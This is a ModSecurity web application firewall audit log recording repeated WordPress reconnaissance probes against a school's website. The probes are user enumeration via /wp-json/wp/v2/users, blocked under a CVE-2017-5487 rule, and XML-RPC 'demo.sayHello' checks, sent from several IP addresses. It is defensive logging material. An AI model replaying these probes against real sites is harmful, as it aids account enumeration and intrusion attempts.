(- - -) Stopwatch2: 1746652170667676 4651; combined=3680, p1=417, p2=3068, p3=22, p4=25, p5=87, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93f8995b-Z-- --4251e001-A-- [08/May/2025:04:09:42 +0700] aBvMFis5rYyn3jlLjjK9IwAAANI 103.236.140.4 38400 103.236.140.4 8181 --4251e001-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4251e001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4251e001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652182684378 3149 (- - -) Stopwatch2: 1746652182684378 3149; combined=1291, p1=421, p2=840, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4251e001-Z-- --47f30f60-A-- [08/May/2025:04:09:46 +0700] aBvMGis5rYyn3jlLjjK9JQAAAMc 103.236.140.4 38404 103.236.140.4 8181 --47f30f60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47f30f60-C-- demo.sayHello --47f30f60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47f30f60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652186398120 5945 (- - -) Stopwatch2: 1746652186398120 5945; combined=4430, p1=558, p2=3650, p3=32, p4=34, p5=93, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47f30f60-Z-- --c9b5bf4c-A-- [08/May/2025:04:09:53 +0700] aBvMISs5rYyn3jlLjjK9JgAAAM0 103.236.140.4 38408 103.236.140.4 8181 --c9b5bf4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c9b5bf4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9b5bf4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652193022202 2292 (- - -) Stopwatch2: 1746652193022202 2292; combined=1061, p1=335, p2=700, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9b5bf4c-Z-- --84388d7b-A-- [08/May/2025:04:09:57 +0700] aBvMJSs5rYyn3jlLjjK9KAAAANQ 103.236.140.4 38412 103.236.140.4 8181 --84388d7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --84388d7b-C-- demo.sayHello --84388d7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84388d7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652197691532 4649 (- - -) Stopwatch2: 1746652197691532 4649; combined=3715, p1=425, p2=3093, p3=22, p4=24, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84388d7b-Z-- --520f702c-A-- [08/May/2025:04:10:32 +0700] aBvMSCs5rYyn3jlLjjK9KQAAANE 103.236.140.4 38422 103.236.140.4 8181 --520f702c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --520f702c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --520f702c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746652232719264 3564 (- - -) Stopwatch2: 1746652232719264 3564; combined=1535, p1=468, p2=1030, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --520f702c-Z-- --c2b36e08-A-- [08/May/2025:04:10:37 +0700] aBvMTSs5rYyn3jlLjjK9KwAAAMA 103.236.140.4 38426 103.236.140.4 8181 --c2b36e08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c2b36e08-C-- demo.sayHello --c2b36e08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2b36e08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746652237580895 4596 (- - -) Stopwatch2: 1746652237580895 4596; combined=3667, p1=440, p2=3030, p3=22, p4=24, p5=88, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2b36e08-Z-- --33137717-A-- [08/May/2025:04:45:27 +0700] aBvUd44K347NtBcwXKwDlgAAAIk 103.236.140.4 38890 103.236.140.4 8181 --33137717-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --33137717-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33137717-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746654327632224 3134 (- - -) Stopwatch2: 1746654327632224 3134; combined=1310, p1=432, p2=848, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33137717-Z-- --3be04355-A-- [08/May/2025:04:45:37 +0700] aBvUgY4K347NtBcwXKwDmAAAAJQ 103.236.140.4 38894 103.236.140.4 8181 --3be04355-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3be04355-C-- demo.sayHello --3be04355-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be04355-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746654337394697 5611 (- - -) Stopwatch2: 1746654337394697 5611; combined=4132, p1=519, p2=3369, p3=27, p4=28, p5=108, sr=69, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be04355-Z-- --70c7b013-A-- [08/May/2025:05:18:21 +0700] aBvcLcP9GxxPAbCroFbLvAAAAFE 103.236.140.4 39254 103.236.140.4 8181 --70c7b013-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.118.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.118.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70c7b013-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c7b013-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656301169373 3582 (- - -) Stopwatch2: 1746656301169373 3582; combined=1539, p1=478, p2=1030, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c7b013-Z-- --4d0f0265-A-- [08/May/2025:05:19:23 +0700] aBvca8P9GxxPAbCroFbLvQAAAFc 103.236.140.4 39258 103.236.140.4 8181 --4d0f0265-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d0f0265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d0f0265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656363969622 3069 (- - -) Stopwatch2: 1746656363969622 3069; combined=1294, p1=421, p2=843, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d0f0265-Z-- --80c04050-A-- [08/May/2025:05:19:27 +0700] aBvcb8P9GxxPAbCroFbLvwAAAFU 103.236.140.4 39262 103.236.140.4 8181 --80c04050-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --80c04050-C-- demo.sayHello --80c04050-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --80c04050-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656367557033 5364 (- - -) Stopwatch2: 1746656367557033 5364; combined=3995, p1=503, p2=3263, p3=24, p4=28, p5=102, sr=93, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80c04050-Z-- --b593921b-A-- [08/May/2025:05:20:47 +0700] aBvcv8P9GxxPAbCroFbLwwAAAEU 103.236.140.4 39274 103.236.140.4 8181 --b593921b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b593921b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b593921b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656447593476 3489 (- - -) Stopwatch2: 1746656447593476 3489; combined=1503, p1=483, p2=987, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b593921b-Z-- --8a13e449-A-- [08/May/2025:05:20:52 +0700] aBvcxMP9GxxPAbCroFbLxQAAAEE 103.236.140.4 39278 103.236.140.4 8181 --8a13e449-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8a13e449-C-- demo.sayHello --8a13e449-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a13e449-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656452305085 4985 (- - -) Stopwatch2: 1746656452305085 4985; combined=3843, p1=508, p2=3127, p3=21, p4=24, p5=94, sr=134, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a13e449-Z-- --2d2e7f0d-A-- [08/May/2025:05:21:10 +0700] aBvc1sP9GxxPAbCroFbLxwAAAEs 103.236.140.4 39284 103.236.140.4 8181 --2d2e7f0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.176 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2d2e7f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d2e7f0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656470343756 3005 (- - -) Stopwatch2: 1746656470343756 3005; combined=1472, p1=482, p2=954, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d2e7f0d-Z-- --a3e85e18-A-- [08/May/2025:05:21:16 +0700] aBvc3MP9GxxPAbCroFbLyQAAAE4 103.236.140.4 39288 103.236.140.4 8181 --a3e85e18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.176 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3e85e18-C-- demo.sayHello --a3e85e18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3e85e18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656476738992 5912 (- - -) Stopwatch2: 1746656476738992 5912; combined=4333, p1=558, p2=3627, p3=23, p4=25, p5=59, sr=94, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3e85e18-Z-- --fa82cf33-A-- [08/May/2025:05:21:18 +0700] aBvc3sP9GxxPAbCroFbLygAAAEQ 103.236.140.4 39290 103.236.140.4 8181 --fa82cf33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fa82cf33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa82cf33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656478519269 2896 (- - -) Stopwatch2: 1746656478519269 2896; combined=1290, p1=422, p2=840, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa82cf33-Z-- --4a88383b-A-- [08/May/2025:05:21:25 +0700] aBvc5Ss5rYyn3jlLjjK9bgAAAMA 103.236.140.4 39296 103.236.140.4 8181 --4a88383b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a88383b-C-- demo.sayHello --4a88383b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a88383b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag 